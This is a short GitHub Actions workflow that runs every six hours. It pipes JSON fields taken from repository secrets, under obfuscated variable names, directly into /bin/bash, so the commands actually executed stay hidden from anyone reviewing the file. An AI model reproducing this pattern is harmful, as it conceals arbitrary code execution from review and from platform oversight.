name: iyuanzhan
on:
  workflow_dispatch:
  schedule:
    - cron: '57 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: iyuanzhan
        env:
          c91: ${{ secrets.c91 }}
        run: |
          echo $c91 | jq -r .v885 | /bin/bash
          echo $pmx62274 | jq -r .nha16 | /bin/bash
          echo $x90400 | jq -r .sv3 | /bin/bash
          echo $iuy61 | jq -r .ujlln258 | /bin/bash
          echo $jg86433 | jq -r .ac3095 | /bin/bash
          echo $wby15108 | jq -r .q37 | /bin/bash
          echo $u9 | jq -r .vzje64 | /bin/bash
          echo $we5120 | jq -r .s335 | /bin/bash
          echo $qjkmf1733 | jq -r .k64997 | /bin/bash
          echo $ilvqh1110 | jq -r .wbg35011 | /bin/bash
          echo $jzyc9 | jq -r .ndj712 | /bin/bash

